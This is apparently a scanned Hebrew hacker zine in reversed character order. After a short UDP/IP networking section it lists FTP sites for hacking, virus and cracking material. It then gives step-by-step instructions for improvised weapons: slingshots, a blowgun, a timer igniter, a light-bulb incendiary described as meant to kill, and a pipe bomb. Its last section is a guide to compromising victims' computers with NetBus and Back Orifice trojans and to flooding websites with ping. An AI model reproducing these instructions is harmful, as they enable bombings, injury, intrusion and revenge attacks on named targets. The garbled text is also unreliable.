ידי לע תלבקתמ הליבחה :ךופהה ךילהתה תא תרבוע איה (דעיה בשחמל העיגמ הליבחה רשאכ
'ה תבכשל הליבחה תרבוע םשמ 7תשרה חיתפ תא הנממ $תפלקמ$ה (תשרה קשממ תבכש IP (
'ה חיתפ תא תפלקמש IP 'ל הליבחה תא ריבעהל תעדוי םש ןיוצמש לוקוורפה יפלו ( UDP.
UDP 'ה חיתפ תא #לקמ (ורותב ( UDP ריבעהל היצקילפא וזיאל עדוי (םש ןיוצמש ורפה יפלו (
.םינותנה תא
(וניארש יפכ (לבא .תונושה תובכשה ןיב תולת יא עבוק תובכשה לדומ UDP תובותכ לע ךמתסמ
'ה IP 'ה בושיחל UDP checksum 'ה תבותכ יהמ תעדל ידכ . IP 'ה תבכש לע (רוקמה לש
UDP 'ה תבכש םע רשקתל IP 'ה תבכש . UDP לש רוקמה תבותכ היהת המ תעדל הלוכי אל
'ה תבכש רחבת וכרד תשרה קשממב היולת וזש ןוויכ (הליבחה IP ןוויכ( הליבחה תא חולשל
ןיב וז היצקארניא .)תשר יקשממ המכ תויהל םילוכי דחא בשחמל (וניארש יפכש UDP 'ל IP
(םייקרפ םילוקישמ ךא (תובכשה לדומ סיסבב תדמועה הדרפהל הריתסב תדמוע םנמא
.ןיע ךכמ םילעהל לוקוורפה יגוה וילחה
% %
%

'ש םדוק וניאר UDP שומיש ידי לע (בשחמ ותוא יבג לע םינוש םידעיו תורוקמ ןיב ןיחבמ
'ה תבכשל תקפסמ (תשרב םינותנ חולשל תנינועמה היצקילפא .םירופב UDP רפסמ תא
3:+
.)ןבומכ קחורמה בשחמב( רשקתל תנינועמ איה ותיא רופה רפסמ תאו (הלש רופה UDP
דרפנב םתוא ריבעמו (הנוש רופ רפסמ ןהמ תחא לכלש (תובר תויצקילפאמ םינותנ לבקמ
'ה תבכשל IP 'ה תבכש (ךופהה ןוויכב . IP 'ה תבכשל תוסנכנה תועדוהה תא הריבעמ UDP (
'ה תבכש (ךכ .ןהב םיניוצמה דעיה רופ ירפסמ יפל (תומיאתמה תויצקילפאל ןתוא תקלחמש
UDP ( בברמכ השעמל תשמשמ multiplexor תועדוה לש םידרפנ םימרז דחאמה ()
'ה תבכשל רבועה דיחיו דחא םרזל תונוש תויצקילפאמ IP ( דרפמכו ( de-multiplexor ()
'ה תבכשמ תועיגמה תועדוהה ןיב דירפמה IP תודעוימ ןהילא רופה ירפסמ יפל (םינוש םימרזל
.תונושה תועדוהה
רפסמ המ תעדל הילע (קחורמ בשחמב (תרחא היצקילפא םע רשקתל תנינועמ היצקילפא רשאכ
(שארמ םירדגומ םירופ לש המישר הנשי (ןכל .תשקובמה היצקילפאה תבשוי וילע רופה
תשקב (לשמל .םהמ תעדוי היצקילפאהש DNS רופל חלשת 53 תעדוה וליאו ( tftp חלשת
רופל 69 .
HaSaTaN
3:9
יתרש FTP תונכותו )תילגנאב(םיסק לופ םא
the FTP adress: directories: name of site (magazine etc..):

N 2600.com (2600 Magazine)
N ads112.rh.psu.edu (Logical Nonsense)
aeneas.mit.edu (Kerberos)
alex.sp.cs.cmu.edu /links/security (Misc)
aql.gatech.edu /pub (40Hex)
U asylum.sf.ca.us (CyberWarriors of
Xanadu)
athena-dist.mit.edu /pub/ATHENA (Athena Project)
U atlantis.utmb.edu (Anti-virus)
bellcore.com (Bellcore)
camelot.usc.edu /pub/cellular/DDIinfodemo (Cellular)
cert.org (CERT)
ciac.llnl.gov (CIAC)
U clark.net /pub/jcase (H/P)
N cnit.nsk.su /pub/unix/security (Security)
coast.cs.purdue.edu /pub (Security/COAST)
N coombs.anu.edu.au /pub/security (Security)
csrc.ncsl.nist.gov (NIST Security)
dartmouth.edu /pub/security (Security)
U ds.internic.net (Internet
documents)
N etext.archive.umich.edu /pub/Zines/PrivateLine (PrivateLine)
ftp.3com.com /pub/Orange-Book (Orange Book)
U ftp.acns.nwu.edu /pub (Mac Anti-virus)
N ftp.acsu.buffalo.edu /pub/security & /pub/irc (Security & IRC)
U ftp.alantec.com /pub/tcpr (Tcpr)
ftp.armory.com /pub/user/kmartind (H/P)
ftp.armory.com /pub/user/swallow (H/P)
N ftp.auscert.org.au /pub (Australian CERT)
N ftp.cerf.net /pub/software/unix/security (CERFnet)
ftp.cert.dfn.de (FIRST)
U ftp.cisco.com (Cisco)
ftp.commerce.net /pubs/standards/drafts/shttp.txt(Secure HyperText)
ftp.cs.colorado.edu
N ftp.cs.ruu.nl /pub/SECURITY (Security & PGP)
ftp.cs.uwm.edu /pub/comp-privacy (Privacy Digest)
ftp.cs.vu.nl
ftp.cs.yale.edu
N ftp.csi.forth.gr /pub/security
ftp.csl.sri.com /pub/nides (SRI)
N ftp.csn.org /mpj (Cryptology)
ftp.csua.berkeley.edu /pub/cypherpunks (Crypto)
3:3
ftp.delmarva.com
N ftp.denet.dk /pub/security/tools/satan
N ftp.digex.net /pub/access/dunk
ftp.dsi.unimi.it
N ftp.dstc.edu.au /pub/security/satan
ftp.ee.lbl.gov
ftp.eff.org /pub/Publications/CuD (EFF)
ftp.elelab.nsc.co.jp /pub/security (Security)
ftp.etext.org (Etext)
N ftp.fc.net /pub/deadkat (TNO)
ftp.fc.net /pub/defcon (DefCon)
ftp.fc.net /pub/defcon/BBEEP (BlueBeep)
U ftp.fc.net /pub/phrack (Phrack)
ftp.foobar.com
U ftp.funet.fi /pub/doc/CuD
ftp.gate.net /pub/users/laura
ftp.gate.net /pub/users/wakko
N ftp.giga.or.at /pub/hacker/ (H/P)
ftp.greatcircle.com /pub/firewalls (Firewalls)
ftp.IEunet.ie /pub/security (Security)
ftp.ifi.uio.no
N ftp.indirect.com /www/evildawg/public_access/C&N/
ftp.info.fundp.ac.be
ftp.informatik.uni-hamburg.de
N ftp.informatik.uni-kiel.de /pub/sources/security
ftp.inoc.dl.nec.com /pub/security (Security)
N ftp.io.org /pub/users/gmouser
ftp.isi.edu
U ftp.lava.net /users/oracle/ (H/P
N ftp.lerc.nasa.gov /security
ftp.llnl.gov /pub (CIAC)
N ftp.luth.se /pub/unix/security
ftp.lysator.liu.se
N ftp.mcs.anl.gov /pub/security
ftp.microserve.net /ppp-pop/strata/mac (Mac)
ftp.near.net /security/archives/phrack (Zines)
ftp.nec.com
N ftp.net.ohio-state.edu /pub/security/satan
ftp.netcom.com /pub/br/bradleym (Virii)
ftp.netcom.com /pub/da/daemon9 (H/P)
N ftp.netcom.com /pub/fi/filbert
N ftp.netcom.com /pub/le/lewiz (Social
Engineering)
ftp.netcom.com /pub/va/vandal (DnA)
N ftp.netcom.com /pub/wt/wtech/
ftp.netcom.com /pub/zz/zzyzx (H/P)
ftp.netsys.com
ftp.ocs.mq.edu.au /PC/Crypt (Cryptology)
N ftp.ox.ac.uk /pub/comp/security
N ftp.ox.ac.uk /pub/crypto (Cryptology)
3::
N ftp.ox.ac.uk /pub/wordlists (Wordlists)
ftp.paranoia.com /pub/toneloc/tl110.zip (ToneLoc)
ftp.pop.psu.edu
N ftp.primenet.com /users/i/insphrk
N ftp.primenet.com /users/k/kludge (H/P)
N ftp.primenet.com /users/s/scuzzy (Copy Protection)
ftp.primus.com /pub/security (Security)
ftp.psy.uq.oz.au
N ftp.psy.uq.oz.au /pub/DES
N ftp.rahul.net /pub/conquest/DeadelviS/script/vms/
ftp.rahul.net /pub/lps (Home of the FAQ)
ftp.sert.edu.au
ftp.sgi.com
ftp.std.com /archives/alt.locksmithing (Locksmithing)
ftp.std.com /obi/Mischief/ (MIT Guide to
Locks)
ftp.std.com /obi/Phracks (Zines)
N ftp.std.com /pub/joeshmoe (AOHELL)
ftp.sunet.se /pub/network/monitoring (Ethernet sniffers)
ftp.sura.net /pub/security (SURAnet)
ftp.technet.sg
ftp.tis.com /pub (TIS)
N ftp.tisl.ukans.edu /pub/security
U ftp.uni-koeln.de. (Wordlists)
ftp.uspto.gov
ftp.uu.net /doc/literary/obi/Phracks (Zines)
U ftp.uwp.edu /pub/dos/romulus/cracks (Copy Protection)
ftp.vis.colostate.edu
ftp.vix.com
ftp.vortex.com
ftp.warwick.ac.uk /pub/cud (Zines)
N ftp.wi.leidenuniv.nl /pub/security
ftp.win.tue.nl /pub/security (Security)
N ftp.winternet.com /users/nitehwk (H/P)
ftp.wustl.edu /doc/EFF (EFF)
U ftp.zoom.com
N ftp.zrz.tu-berlin.de/pub/security/virus/texts/crypto (Cryptology)
garbo.uwasa.fi /pc/crypt (Cryptology)
N gti.net /pub/safetynet
gumby.dsd.trw.com
hack-this.pc.cc.cmu.edu (Down for Summer)
N heffer.lab.csuchico.edu (Third Stone From The Sun)
hplyot.obspm.fr
info.mcs.anl.gov
jerico.usc.edu
U invircible.com /mcsnet.users/crisadm (Virii)
l0pht.com (The L0pht)
lcs.mit.edu /telecom-archives (Telecom archives)
lod.amaranth.com (Legion of Doom)
mac.archive.umich.edu
3:=
mary.iia.org /pub/users/patriot (Misc)
monet.ccs.itd.umich.edu
net.tamu.edu /pub/security/TAMU (Security)
net23.com /pub (Max Headroom)
nic.ddn.mil /scc (DDN Security)
N nic.sura.net /security
N oak.oakland.edu /pub/hamradio (Ham Radio)
N oak.oakland.edu /SimTel/msdos/sound (DTMF decoders)
N oak.oakland.edu /SimTel/msdos/sysutil (BIOS attackers)
paradox1.denver.colorado.edu /anonymous/text-files/pyrotechnics (Pyro)
parcftp.xerox.com
N prism.nmt.edu /pub/misc (Terrorist
Handbook)
pyrite.rutgers.edu /pub/security (Security)
relay.cs.toronto.edu /doc/telecom-archives (Telecom)
rena.dit.co.jp /pub/security (Security)
research.att.com /dist/internet_security (AT&T)
ripem.msu.edu /pub/crypt (Ripem)
rtfm.mit.edu (Etext)
rtfm.mit.edu /pub/usenet-by-group (Usenet FAQ's)
sable.ox.ac.uk (Wordlists)
scss3.cl.msu.edu /pub/crypt (Cryptology)
sierra.stanford.edu
spy.org (CSC)
suburbia.apana.org.au /pub/unix/security (Security)
sunsolve1.sun.com
tam.cs.ucdavis.edu
technion.ac.il
theta.iis.u-tokyo.ac.jp /pub1/security (Security)
titania.mathematik.uni-ulm.de /pub/security (Security)
toxicwaste.mit.edu /pub/rsa129/README (Breaking RSA)
ugle.unit.no
N unipc20.unimed.sintef.no
vic.cc.purdue.edu
N vixen.cso.uiuc.edu /security
whacked.l0pht.com (Mac + H/P)
wimsey.bc.ca /pub/crypto (Cryptology)
HaSaTaN
3:J
הליגר הקגור
....תונבל עדוי וידיא לכש הושפ יכה הקגורה
םירמוח :
תואה תוצב !ע תכיתח % Y .
.רתויב הקזח הימוג %
.הבע לזרב וח %
.ראק %
:הנכה תוארוה
#וס םע ךורא דחא ספ היהת אלא הרוגס היהת אל איהש הככ התוא וכתיחו הימוגה תא וחק
.הלחתהו
תואה תרוצב !עה תכיתח תא וחק ןכמ רחאל Y תכיתח לש תונוילעה תווצקהמ דחא לכל ורבחו
.לזרבה יוח תא התיא תורילו התוא חותמל ולכותש בל ומיש וישכע .הימוגה לש רחא דצ !עה
+אל יריל םירודכה תא רוציל םיכירצ ונחנא #וסבל וישכע
' !ושפ +!םתוא םירצוי ונחנא ךיא זא
תוכיתח םיכתוח זאו ראקה תרזעב רמינס םישולש לש ךרואל לזרבה וח תא םיכתוח ונחנא
.תחא לכ רמינס שולש דע םייתש ךרואב
וחנא ןכמ רחאל .ןק !ח שאר ומכ הארת איהש הככ יצחל םימקעמ ונחנא הכיתח לכ #וסבל
.םיבזוע זאו םיכשומ ( הימוגה לע תוכיתחה תא םישיבלמ
םוקמ לכב ןכוסמו באוכ ארונ םג הזו בצקב םייניע איצומ הז ' םינפה רוזיאל ןווכל אל תוריהז
.עגופ הזש רחא
ופ ופ
תונמוימה לע ןמאתהל ולכות זא שפוח הז וישכע( םירועש ריבעהל ידכ ישפו ושפ ופ ופ
.)ילכב םכלש
םירמוח :
.םיכירצ אל רבכש שו %
.תורבחמ ריינ %
.םיירפסמ %
:הנכה תוארוה
תרזעב השק םכל היה םא ( ולש יולימה תאו ירוחאה קלחה תא ול ואיצוהו שוה תא וחק
.םיירפסמ שי הז ליבשבש םכל ועדתש זא םיידיה
הצקל ותוא וסינכת זאו ךימס היהיש הככ םימ עמ םע ותוא ובברעתו ריינ וחק ןכמ רחאל
.שוב #סאנש ריוואה !חל ללגב הצוחה #ועי ריינה ןכמ רחאל .קזח ופשנתו
תאז לכב לבא באוכ אל ללכב הז וגאדת לא( .קוחר ריינה תא #יעהו הקזוחב הצוחה אציי #וסבשו
.)!!!םייניעל ונווכת לא
Golgolet & HaSaTaN
3:N
שו עלקמ
.הקגורהו ופ ופה ןורקיע לע יונב .ןכוסמו קזח ארונ אוהש יתאצמהש עלקמ
:םירמוח
.)הבע רתויש המכ #ידע( קזח שו %
.ארונ הקזח הימוג %
.םידופיש %
.ןיכס/םיירפסמ %
:הנכהה תוארוה
ושע ןכמ רחאל (יולימה תאו יולימה תא םסוחש ירוחאה קלחה תא ונממ ואיצוהו שוה תא וחק
.ינשה לומ דחא קוידב ויהישו שממ םילודג אל ויהיש שוב םירוח ינש
הככ התוא ורזגו הימוגה תא וחק (וישכע .שוה לש ירוחאה קלחה תויהל הבוח םירוחה לע
הככ בו בו הלש םידדצה ינש תוא ורשקתו םירוחב התוא וליחשת זאו ךורא ספל ךפהיתש
!!! אצת אל איה ותוא וחתמתשכש
תעכ (תועבצאה תרזעב ותוא וספתתו ןקה ימדיקה חתפה ךרד דופישה תא וסינכה ןכמ רחאל
קזח סוי דופישה .ובזעתו רוחאל ןמז ותואב דחיב הקזחה הימוגה תאו לקמה תא וכשמת
אוהש רחא רבד לכ וא רקלק( ריינ ( םדאנב :הזש יאנתב( ולומ היהיש המב רוח השעיו (הללאל
.)דופישל תיסחי ךר
ארונ םג הזה עלקמה ךכ תובקעבו ול ןתונ ימדקה רוחהש תוביציה הז הזה עלקמב בוש המ
.קייודמ ארונ םגו ןכוסמ
םיעלקמל תוימוג
:המר לע תוימוג
:םה ריכמ ינאש המר לע יכה תוימוגה
םיינפוא לש תימינפ %
תופקשמ לש תוימוג %
אוה הלאכ ואצמתש יוכיסה לבא ( תוליעי יכה( דנליאתמ םירז םילעופ לש םיעלקממ תוימוג %
)רתויב ךומנ
:תוימוגה תא אוצמל רשפא הפיא
.ןסחמב ( םעדיובב ( םיפדמב תיבב ושפחת
....תימינפ וא תפקשמ ונקתו רופסה תויונחל וכלת
ומכ בשחנ הז ' ןכוסמ(....דחא #א םש ןיאשכ ושפחתו םירז םילעופ לש הדובע תומוקמל וכלת
.)הז תא עצבל הווש אל ןכלו םוקמל הצירפ
. ןומה ונממ םתדמלשו רמאמהמ םתינהנש הווקמ ארונ ינא
Golgolet & HaSaTaN
3:.
םיצפנל היעשה ןונגנמ
:םיכרצמ
)םירעוכמהו םיעבורמה(!רתויב ושפה גוסהמ םיגוחמ םע ררועמ ןועש
לידב))רתוי הברה(רתוי תובו תואצותל !יאדכ(םחלמ
...ינוניב(לודג(ןק גרבמ
הירב 6-9V )דבוע דימת אל הז תוחפ !!בו יכה אצוי הז(
ל(תוירב תיב 9 ))יתרפס אל םעפ #א...ןמותמ(השושמ רבחמו לוגע רבחמ םע והשמ הז
ל( 6 הז 4 לש תוירב 1.5 )
ול שיש והשמ רציקב 2 םהמש)'()( םיוח
אצוי 6-9V
הרונמ 75W
ןולינ תיקש
(רצק דדוב למשח וח 10 )רמינס
זא לבא לוהוקלא/קלדב גופס לאו ריינ םג רשפא !קילד והשמ(...ךתות/חדקא/הבור לש רודכ
רתוי היהשה ךירצ
)!...ראשי אלו הדאתמ לוהוקלאה יכ הרצק
.....לכש תצק
הדובעל
םתוא #וסאת ופועי םייניש ילגלג הברה רהזת תונידעב הרוחאה תא ול חתפתו ןועשה תא חק
ויה םה ךיא הקרתו
בשחמב שיש קו"ג ןיעמה הז(תאזכ הלודג הרוחש הדוקנ םע ילמשח לגעמ הארת התא םיחנומ
לש רזומ ןונגס CPU )
אוה קתקתי ןועשהש השועש רבדה "צרבקה הז #סכ עבצב דומע ונכ םש שי ונתוא ןיינעמ אל הז
לעו דעור
הז )כ$דב( רוחש לוגע רבד הזיא םג םש שי ונתוא ןיינעמ אל הז םג ..ןועשה תא זיזמ הז יפ
םזמזה
ןועשה םע אל לבא #ורשו שולת וב םקנתהל הצור התא םא( ס$היבל רקוב לכ ךתוא ריעמש רבדה
הזה
לזרב ומ הזיא םש שי והשמ דועו הא !!םיכירצ ונחנא הז תא )!הצצפ ונממ ןיכהל ךירצ התא יכ
ויתחתמש
פיב (פיב פיב(םזמזל םזמזל םימרוג םה ינשב דחא םיעגונ םה םא #סכ עבצב והשמ ןיעמ שי
)...פיב
דחאב הסנת ינשה הצקהו #וסכה ומב ולש דחא הצק םע עגתו דדובה וחה תא חק בו
םזמזה לש םיילגרה
םיכירצ ונחנא התואש לגרה תאז הינשה לגרהש ןמיס הז םזמזב שורשירל םורגת םיילגרה תחא
השק והשמ לע !!תונידעב !פנתו הרונמה תא הכותל סינכת תיקשה תא חק
)גרוב ומכ( הרונמה לש המלה תא ךל ראשי)עצפת אלש ידכ הפצירה לע תיקשה תא קורזת לא(
םע תיכוכז דומעו 4 רואה תא השועש רבדה הל וח (םילוב למשח יוח
שי הפ 2 :תויש
1 הרונמה לש ןותחתה קלחל הירבה תיב לש םיוחה דחא תא איהש ומכ הרונמב שמתשהל)
לכה(השרשיר אלש םזמזה לש לגרה התוא לא הרונמה לש דצהמ )םידרפנה םיוחהמ(דחא וחו
)!המחלהב
תחתמש #סכל #סכ ומה ןיב םיסו )...#סכ ריינ אל( ריינ תכיתח חק ןכוסמה עקה וישכע
םתאש ןמזה #צפצל ליחחתי אל ןועשהש ידכ
.#סכ ומה לש הצקל םיחלת הירב תיבהמ ראשנש וחה תא חק םימיחלמ
2 )!יתוכיא רתוי (ךבוסמ רתוי הברה(דרפינב ותוא רבחלו הל וחה תא חותחל)
לש דצ לכל םירבחמ ושפ דצלו גרובה לש המלל הרונמב רבחל םוקמב קר רבדה ותוא םישוע
הל וחה
3:;
הלחתהב היהש ומכ לכה ורבחתו #סכה ומה ךע !וחלל ילב תוריהזב #דה תא ואיצות וישכע
!וחב הל וחה תאו תוירבה תא וריאשת לבא
םעפ דוע 2 :תויש
1 םתקריפש ירחא(לאו ריינ ךותל הפירש קבאה תא וסינכת'רודכ לש הפירש תקבא)
)...קיפסי ריקב רוח(ותוא עגי םגשו ריינה לע הל וחה תא וחינת
!ערקיש יאדכ אלו שיגר דואמ וחה תוריהזב לאו ריינה םע הל וחה תא ופעתו הקבאב
ואיבחת !צופתי הזש םיצור םתאש העשל ןועשה תא ונבחת הצצפה תא ורבחת ריינה ךותב/לעמ
אלש םוקמב
בל ומישי
2 )...לוהוקלא/קלד( חקלתמ רמוחב גופס ריינ םע קר רבדה ותוא )
לבא םזמזה םע לגעמ רוגסיו דרי #סכה ומ #צפצמ ןועשה לש ןמזה עיגיש יתמש הז הרקיש המ
ונישע ונחמא
םע הזל רבחתמש לגעמ דוע 9V אלו 1.5V ןומזיתה תא םילצנמ ונחנאו הל תוחל רבחתמש
ןועשה לש לגעמהו
:הככ ךרעב הז עורג ורשב הצצפה תקלדה ךרוצל
HFM
הינש היש
הל וחה תא רבחל הרונמה תא םוקמב רבחל םזמזה תא איצוהל ןועשה תא חותפל ושפ
!פנה תא !צופי אוה !צפצי ןועשהש םוקמב זאו !פנה לש ליתפל
HFM
3=*
;/J 0
/</</</</</</<~bW</</</</</</<
_]D _?E
+ % = 0
]b ]@]
aAUA
הרונמ תצצפ
:םיכרצמ
.רחא קילד שממש רבד לכ וא קלד%
.לזמ תצק%
.פיולצ%
.הל תרונמ%
.קרזמ%
.גורהל םיצור תמאב םתאש ובשימ%
:הנכהה ןפוא
.קרזמה םא קלדה תא)..."וכו (קלד (הפירש קבא( קילד רבד לכ סינכהל הרונמב ןק רוח רובשל
הרונמ תיבל סינכהל
דואמ בושח
)...יאדכ אל םצע םדוק תוסנל(
HFM
3=+
שיש בו יכה עלקמ
!!!יאדכ יאדכ יאדכ יצוציפ עלקמ יבאמ השורי אוה הז עלקמ
:םיכרצמ
ךרואב שרק% 30 .מ$ס
.)!עמ #ידע( הסיבכ בא%
.)םתוא סורהל ךירצ( שיש םילוז יכה םיבא הברה%
.שיפ%
רמסמ% 5 .שאר ילב #ידע מ$ס
.תוליגר תוימוג%
.פיולצ / קבד%
:הנכהה ןפוא
:אבה רויצב ומכ ןוילעה קלחב רמסמה תא קופדל
ךכ הארי הזש
איהש היש לכב באה תא #יסונ וישכע
ךכ האריש
.בא הז םודאבש המ
!יפקה לש םיידיה ינש ןיב הימוג םיסינכמ םיבאה לש !יפקהו תוימוגהמ םיעילק ןיכנ וישכע
ומכ הארי הז #וסבלו הרוחאל תימדיקה דיה תאו המידקל תירוחאה דיה תא םיזיזמ ךכ רחאו
:אבה רויצב
:םירוי ךיא
!יפקה תא םיסינחמ ךכ רחאו שרקה לכ ךרואל התוא םיריבעמ רמסמה לע הימוגה תא םילות
באוכ דואו םירידא םיקחרמל #ע הז באה לע םיצחולשכו שרקה לע קבדומש באל
דצהמ יפוס הארמ
HFM
רוניצ ןעמ
3=9
TRC
SB C?b`D dB^
RUcU]
:םירמוח
םימיאתמ םיקקפ ינשו לזרב רוניצ%
קד חדקמ ) החדקמ%
!פנ רמוח/הפירש קבא%
קד למשח וח%
הל תרונמ% 3V
:םיליחתמ
תא הרונמל רובשל הפרש קבאה תא סינכהל ינש דצמ דחא דצמ רוניצה תא רוגסל
וחה ליבשב רוח ראשינש קקפב וחדקת )םיוחה תא הל רבחל ןבומכו( תיכוכזה
הל הרובשש( הרונמהש קקפה תא ורגסתו וחה תא םינפב וליחשת הרונמה לש
ונרביד םדוקש היעשהה ןונגנמה תא !וחב וחינת וישכע םינפב )תיכוכזה
ו !!!!!!!!!םםםםםםםםםםםםםוווווווווווווווווווווב

HFM
בשחמל הצירפ
3=3
ינא הפ לבא תויש המכ שי השק אל שממ איה זא ןעוצקמ התא םא :חרכהב אל (השק הלאש
יכה ךרדה תא ריבסי
.$תירוחאה תלדה$ ' הצופנ
ךרדב אלא הרישיה ךרדב אל ןברוקה לש בשחמל םיסנכנ םתאש תרמוא תירוחאה תלדה
.תמכחותמה
אוה !בוקה תא ולצא ליעפי אוהשכו ןברוקל )תירוחא תלד וא ינאיור סוס( !בוק חולשל ךירצ
תלדה תא חתופ
.עדיש ילב
(םיצבק תקיחמ (ןברוקה לש בשחמב םיצבקה לכל השיג לשמל םכינפל תוחותפ תובר תוירשפא
(םיצבק תקתעה
ה לש הריגסו החיתפ (תוינכות לש הלעפה (נרניאה תואמסיס תיאר (ךסמ תיאר CD-ROM
.תויורשפא אלמ דועו
.םיצבק ינש לע תויונב תירוחאה תלדה תונכות
!בוקה Clinet .ליעפהל רומא ןברוקהש !בוקה אוהו .#יקתהל הצורש ימ לצא תויהל רומא
.ולש בשחמ לע האלמ הילש ךל רשפאמו (ןברוקה לש הנגהה תכרעמ תא לרנמ !בוקה
תומויסב םיצבקב קר תויהל םילוכי םינאירו םיסוס EXE COM BAT וא VBS .
תומויסב קר תויהל םילוכי בשחמל הצירפ םירשפאמש םינאיור םיסוסו תוירוחא תותלד EXE
COM וא VBS (
לש תמויסב קר םיאצמנ םה דימת עמכ לבא EXE .
.ןורקיע ותוא לע קוידב תודבוע תונכותה לכ יכ הצירפה תונכות לכב םיצרופ ךיא ריבסי אל ינא
םה םיבשחמ תצירפל רתויב תוושפהו רתויב תוצופנה תונכותה NetBus 'ו Back Orifice (
רוציקבו NB ו BO .)רתאב םתוא דירוהל רשפא(
לשמל ומכ תוכבוסמ רתוי הצירפ תונכות שי Happy99 .
הסרגב( סבנב םימשתשמ םתא םא 1.60 !בוקה תא חולשל םיכרצ םתא )הלעמו Patch.exe
(הנכותה םע #רוצמש(
בוריקב ספותו לוחכ עקר לע דיפל לש ןוקייא לעב אוה !בוקה 462 רתוי תואסרגב (ייבוליק
!בוקה םש תוכומנ
אוה SysEdit.exe )רופא םייניש לגלג אוה ולש ןוקייאהו
תכרעמ תא לרני !בוקה זא !בוקה תא ליעפי אוה םא (!ורפל םיצור םתא וליאש ןברוקל
רשפאיו ולש החבאה
ליעפיו ןברוקה לש בשחמב תונולחה תיקיתל ומצע תא קיתעי םג !בוקה (ולש בשחמל !ורפל םכל
לכב ומצע תא
.בשחמה תא חתפי אוהש םעפ
(קחשמל המודמש רחא ןאיור ול חולשל םילוכי םתא םימכותומ רתוי תויהל םיצור םתא םא
(הנומת (הנוכת
לש "צפה תא ןיקתמ !בוקה םצעבו ("וכו העדוה NetBus לש וא Back Orifice ןברוקהש ילבמ
.עדי
!םינאיור םכמצעב רוציל םילוכי םתא םתרזעבש תונכות וליפא שי
'ה רפסמ תא םג תעדל םיכירצ םתא בשחמל !ורפל ידכ IP .ולש
יפ ייאה תועצמאב (ולש יפ ייאה ' ותוא רתאמש רפסמ שי נרניאל רבוחמש בשחמ לכל(
חלושו לבקמ בשחמה
)נרניאל תורשקתה לכ ירחא תונתשהל רומא יפ ייאה רפסמ (נרניאל עדימ
אצמנש ימ לש יפ ייאה תא תולגל ידכ זא (ויקיסייאה תרזעב םישנאל !ורפל םכל !ילממ ינא
םכלש המישרב
הנכותב ושמתשת icq ip sniffer .יפ ייאה ירפסמ תא תימווא הלגת איהו
הנכותב ושמתשת (תרחא ךרדב ןאיורה תא חולשל םיצור םתא םא ip sniffer תא תולגל ידכ
.יפ ייאה
.ןברוקה לש יפ ייאה רפסמ תא תימווא םילגמש םינאיור םג שי
'ה תא חתפ אוהש ירחאו (ןברוקה לש יפ ייאה תא םיעדוי םתאש ירחא( וישכע Patch וחתפת )
(סבנ תא
רותפכה לע וצחליתו (ךירצש הפיא יפ ייאה תא ומשרית Connect ! ולש בשחמל םתצרפ ... ו (
םורגל (םיצבק ול קוחמל (םיצבקב ול לכתסהל (קסידרהה לכ תא ול קוחמל םילוכי םתא וישכע
ולש בשחמל
3=:
ה תא ול חותפל וליפאו (דנואס יצבקו תונומת (נרניא יפד (םירתא (תוינכות ליעפהל CD-
ROM .
'ב םישמתשמ םתא םא Back Orifice !בוקה תא ןברוקל חולשל םיכרצ םתא NotBO.exe םאו
!בוקה תא ליעפי אוה
'ה תייקיתל ומצע תא קיתעי !בוקה זא System לש Windows " םשל exe הדוקנ חוור( " . exe )
ומצע תא !יריו
בוריקב ספותו #וקש ןוקייא לעב אוה !בוקה (בשחמה תא ליעפי אוהש םעפ לכב ןברוקה לצא
122 .ייבוליק
תרזעב םיבשחמל !ורפל רשפא NetBus וא Back Orifice ירפסמ לש תיארקא הקירס ךרד םג
ישמתשמש יפ ייא
.הצירפה תונכות לש "צפה תא וליעפה םהלש םיבשחמה
:תוביס שולש ללגב ויקיסייאה ךרד םישנאל !ורפל םכל יתצלמה ינא
םילוכי םג םתאו (וילא !ורפל םיצור םתאש ייימ לש יפ ייאה תא תולקב תעדל םילוכי םתא '
תא ול חולשל
.ויקיסייאה ךרד ןאיורה
:ולש בשחמל !ורפל םיצוררר םתאש ימ לע םירפ אלמ תעדל םילוכי םתא '
לכל עמכש רעשמ ינא (תרחא !ראמ וא !ראב והשימל !ורפל םא רוחבל םילוכי םתא ךכו
שי םכלש התיכה
.עדיש ילבמ וב םוקנל םכלש תונמדזהה תאז םכתוא ןבציע והשימ םע זא ויקיסייא
לאו םיתימא אלל םכלש םירפה לכ תא ונשת זא !ראהמ והשימל !ורפל םינווכתמ םתא םא(
הרזחב םתוא ונשת
לכ ובש שדח ויקיסייא חותפל םיכירצ םתא זא םיריכמ םתאש והשימל הז םאו (ךכ'רחא
ויהי םכלש םירפה
.)!ולש בשחמל םתצרפ םתאש דושחי אלש !םייתימא אל וראשיו
תא ול !ורפל םילוכי םתא גניקאהב םיניייבמ םג םתאו בשחמל והשימל םיצרופ םתא םא '
חולשל זאו (ויקיסייאה
.וכרד םינאיור םישנאל חולשל (ומשב תועדוה
.םהלש בשחמל !ורפל ילבמ םג םישנא לש ויקיסייא !ורפל םילוכי םג םתא
:םוכיסלו
:ךירצ בשחמל !ורפל ידכ
הצירפ תנכות %
ותוא חתפי אוהשו תירוחא תלד וא ינאיור סוס ןברוקל חולשל %
ןברוקה לש יפ ייאה רפסמ תא תעדל %
HFM וא program44
םילגמ ךיא IP (קרימב והשימ לש MIRC )
:םיבתוכ (ושפ ארונ
nickname /dns
בותכש הפיא( nickname 'ב םשה תא בותכל םיכרצ םתא Mirc תא תעדל םיצור םתאש ימ לש
)ולש יפ ייאה
3==
Progaram44
וילא !ורפילו םירתא ליפהל
+ רתא ליפהל ךיא
דע עדימ ול חולשל רשפא תלדב תקיפד תיש הזל ארקי ינא וילע !חל םע רתא ליפהל רשפא
!צופתמ ולש רברסהש
:אמגודל דובעל קיספמ אוה זאו
ping -t -l 256 xxx.xxx.xxx.xxx
3=J
'ב הדוקפה תא בותכל ךירצ DOS אל הזש רמוא י סונימה רתאה לש יפ ייאה םה םיסקיאהש
המכ רמוא אלו קיספי
רפסמה תא םירהל ךירצ תלדב הקיפדה תא ריבגהל םיצור םתא םא ול חולשל םיייב 256
הובג רתוי רפסמל
.תונולח המכב ליעפהלו
הישב רתא םיליפמ םתאשכ (רתאל םיסנכנ םתאשכ המל ןפדפדב םושר רתאה לש יפ ייאה
תויהל בייח אוה תאזה
ןיא םיירפ םירתאל (ההז יפ ייא תבותכ שי תרש ותוא לע םיאצמנש םירתאל( ולשמ תרש םע
תרש ללכ'ךרדב
.)רחא תרש לע םימקוממ םהו םהלשמ יאמצע
:תאזה הדוקפה תא בותכלו סקינוי וא סקונילב שמתשהל !למומ
finger ¡¡¡¡¡¡¡¡¡¡¡ http://webpage_goes_here
